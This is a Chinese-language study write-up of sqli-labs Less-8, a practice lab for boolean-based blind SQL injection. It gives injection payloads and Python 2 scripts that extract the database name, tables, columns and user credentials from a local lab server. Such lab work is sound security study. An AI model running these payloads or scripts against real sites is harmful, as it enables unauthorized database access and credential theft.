之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
布尔型 sql 盲注
Less-8 布尔型sql盲注-单引号
测试
payload
?id=1'or 1=1--+
四种方法讲解:
- left()
- ascii()、substr()
- regexp
- ord()、mid()
其中:
left(string,2)=’sa’: string 的前两位为sa
ascii(substr(string,2,1))=102: string的第二位开始的后一位的ascii码为102
table_name regexp ‘^us[a-z]’:table_name 是以 us 为开头的
ord(mid(string,2,1))=68: stringd的第二位开始的后一位的十六进制为68
猜字段数
?id=1' order by 2--+ ?id=1' order by 3--+ ?id=1' order by 4--+
运行脚本
# -*- coding: utf-8 -*- # filename:Less08-1 field_num.py import hackhttp import re def field_num(arg): print "field_num start test..." for j in range(1,10): hh = hackhttp.hackhttp() msg = "1%27%20order%20by%20{j}--+".format(j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' not in count: print "测试第%s位" % (j) break print "查询的字段数为: {j}".format(j=j-1) if __name__ == '__main__': field_num('http://10.10.10.137/sqli-labs/Less-8/?id=')
猜数据库名
?id=1'and left(database(),1)='s'--+ ?id=1'and left(database(),2)='se'--+ ?id=1'and left(database(),3)='sec'--+
运行脚本
# -*- coding: utf-8 -*- # filename:Less08-2 database_name.py import hackhttp import re def database_name(arg): print "database_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz') name="" for k in range(1,2): for i in payloads: hh = hackhttp.hackhttp() msg = "1%27and%20left(database(),{k})=%27{i}%27--+".format(k=k,i=i) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: print "数据库的前段部分是%s" % (i) break else: print k for k in range(2,20): for j in payloads: hh = hackhttp.hackhttp() msg = "1%27and%20left(database(),{k})=%27{i}{j}%27--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: i+=j print "数据库的前段部分是%s%s" % (i,j) else: print k,i,j print "数据库名为: {i}".format(i=i) if __name__ == '__main__': database_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
猜表名
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101–+
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),2,1))=109–+
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),3,1))=97–+
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114–+
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101–+
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=102–+
结果为: emails referers uagents users
运行脚本
# -*- coding: utf-8 -*- # filename:Less08-3 table_name.py import hackhttp import re def table_name(arg): print "table_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') table_name="" database_name="" for k in range(5): for i in range(1,10): for j in range(65,122): hh = hackhttp.hackhttp() msg = "1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: table_name+=chr(j) #database_name+=str(k+1) print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j) break table_name+=" " print "security 数据库的表名为: {table_name}".format(table_name=table_name) if __name__ == '__main__': table_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
猜列名
?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^u’ limit 0,1)–+
?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^us’ limit 0,1)–+
?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^use’ limit 0,1)–+
?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^username’ limit 0,1)–+
结果为 id last password username
运行脚本
# -*- coding: utf-8 -*- # filename:Less08-4 column_name.py import hackhttp import re def column_name(arg): print "column_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz') payloads2 = list('abcdefghijklmnopqrstuvwxyz') name="" for k in range(0,5): # 假设5个表 payloads2 = list('abcdefghijklmnopqrstuvwxyz') for y in range(26): # 每个列循环26遍列名首字母,确保考虑26个字母出现在列名首的可能性 for i in payloads2: # 判断每一遍的列名首字母是不是在列表里 hh = hackhttp.hackhttp() msg = "1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20regexp%20%27^{i}%27%20limit%20{k},1)--+".format(k=k,i=i) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: print "第%s个列的第一位是%s" % (k,i) payloads2.remove(i) # 查询到一次之后就将资格首字母从列表删掉 break else: print k,i if i == 'z': # continue for x in range(0,10): for j in payloads: hh = hackhttp.hackhttp() msg = "1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20regexp%20%27%5e{i}{j}%27%20limit%20{k},1)--+".format(i=i,j=j,k=k) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: i+=j print "第%s个列的列名是%s" % (k,i) else: print k,i,j name = name+i+' ' name = name+i+' | ' print name if __name__ == '__main__': column_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
猜数据
ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。
cast(字段名 as 转换的类型 )?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68–+
结果为:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
运行脚本
# -*- coding: utf-8 -*- # filename:Less08-5 data.py import hackhttp import re def data(arg): print "data start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/') payload2 = ['username','password'] data="username: " for k in payload2: # 两个列名 for x in range(10): # 每个列假设十个数据 for i in range(1,10): # 每个数据的第i位的值匹配j for j in range(65,122): # hh = hackhttp.hackhttp() msg = "1%27%20and%20ord(mid((select%20ifnull(cast({k}%20as%20char),0x20)from%20security.users%20order%20by%20id%20limit%20{x},1),{i},1))={j}--+".format(k=k,x=x,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: data+=chr(j) print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j) break data += "\t" print "{data}".format(data=data) data += "\npassword: " if __name__ == '__main__': data('http://10.10.10.137/sqli-labs/Less-8/?id=')